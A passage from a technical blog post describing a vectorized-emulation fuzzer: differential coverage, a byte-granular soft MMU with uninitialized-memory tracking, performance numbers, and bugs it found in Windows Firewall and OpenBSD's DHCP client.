These are really just glorified branches with a VM exit to save the input and memory/register state related to the crash. No reason to really go in depth here.



Okay but why?

Okay we’ve covered all the very high level details of how vectorized emulation is possible but that’s just academic thought. It’s pointless unless it accomplishes something.

At this point all of the next topics are going to be their own blogs and thus are only lightly touched on

Differential coverage / Hardware accelerated taint tracking

Differential coverage is a special type of coverage that we are able to gather with this vectorized emulation model. This is the most important aspect of all of this tooling and is the main reason it is worth doing.

Since we are running 16 VMs at a time we are able to very cheaply (a few cycles) do a horizontal comparison with other VMs. Since VMs are deterministic and only have differing user-controlled inputs any situation where VMs have different branches, different register states, different memory states, etc is when the user input directly or indirectly caused a change in behavior.

I would consider this to be the holy grail of coverage. Any affect the input has on program state we can easily and cheaply detect.

How differential coverage combats state explosion

If we wanted to track all register states for all instructions the state explosion would be way too huge. This can be somewhat capped by limiting the amount of state each instruction can generate. For example instead of storing all unique register values for an instruction we could simply store the minimums and maximums, or store up to n unique values, etc. However even when limited to just a few values per instruction, the state explosion is too large for any real application.

However, since most memory and register states are not influenced by user input, with differential coverage we can greatly reduce the amount of instructions which state is stored on as we only store state that was influenced by user data.

This works for code coverage as well, for example if we hit a printf with completely uncontrolled parameters that would register as potentially hundreds of new blocks of coverage. With differential coverage all of this state can be ignored.

How differential coverage is great for performance

While the focus of this tool is not performance, the performance costs of updating databases on every instruction is not feasible. By filtering only instructions which have user-influenced data we’re able to perform much more complex operations in the case that new coverage was detected.

For example all of my register loads and stores start with a horizontal compare and a quick jump out if they all match. If one differs it’s a rare enough occasion that it’s feasible to spend a few more cycles to do a hash calculation based on state and insertion into the global input and coverage databases. Without differential coverage I would have to unconditionally do this every instruction.

Soft MMU

Since the soft MMU deserves a blog entirely on it’s own, we’ll just go slightly into the details.

As mentioned before, we interleave memory at the dword level, but for every byte there is also a corresponding permission byte. In memory this looks like 16 32-bit dwords representing the permissions, followed by 16 32-bit dwords containing their corresponding memory contents. This allows me to read a 64-byte cache line with the permissions which are checked first, followed by reading the 64-byte cache line directly following with the contents.

For permissions: the read, write, and execute bits are completely separate. This allows more exotic memory models like execute-only memory.

Since permissions are at the byte level, this means we can punch a one-byte hole anywhere in memory and accessing that byte would cause a fault. For some targets I’ll do special modifications to permissions and punch holes in unused or padding fields of structures to catch overflows of buffers contained inside structures.

Further I have a special read-after-write (RaW) bit, which is used to mark memory as uninitialized. Memory returned from allocators is marked as RaW and thus will fault if ever read before written to. This is tracked at the byte level and is one of the most useful features of the MMU. We’ll talk about how this can be made fast in a subsequent blog.

Performance

Performance is not the goal of this project, however the numbers are a bit better than expected from the theorycrafting.

In reality it’s possible to hit up to 2 trillion emulated instructions per second, which is the clickbait title of this blog. However this is on a 32-deep unrolled loop that is just adding numbers and not hitting memory. This unrolling makes the branch divergence checking costs disappear, and integer operations are almost a 1-to-1 translation into AVX-512 instructions.

For a real target the numbers are more in the 40 billion to 120 billion emulated instructions per second range. For a real target like OpenBSD’s DHCP client I’m able to do just over 5 million fuzz cases per second (fuzz case is one DHCP transaction, typically 1 or 2 packets). For this specific target the emulation speed is 54 billion instructions per second. This is while gathering PC-level coverage and all register and memory divergence coverage.

So it’s just academic?

I’ve been working on this tooling for almost 2 years now and it’s been usable since month 3. It’s my primary tool for fuzzing and has successfully found bugs in various targets. Sadly most of these bugs are not public yet, but soon.

This tool was used to find a remote bluescreen in Windows Firewall: CVE-2018-8206 (okay technically I found it first manually, but was able to find it with the fuzzer with a byte flipper even though it has much more complex constraints)

It was also used to find a theoretical OOB in OpenBSD’s dhclient: dhclient bug . This is a fun one as really no tradtional fuzzer would find this as it’s an out-of-bounds by 1 inside of a structure.

Future blogs

  • Description of the IL used, as it’s got some specific designs for vectorized emulation

  • Internal details of the MMU implementation

  • Showing the power of differential coverage by looking a real example of fuzzing an HTTP parser and having a byte flipper quickly (under 5 seconds) find the basic “VERB HTTP/number.number\r\n". No magic, no `strings` feedback, no static analysis. Just a useless fuzzer with strong harnessing.

  • Talk about the new IL which handles graphs and can do cross-block optimizations

  • Showing better branch divergence handling via post-dominator analysis and stepping VMs until they sync up at a known future merge point

❌
❌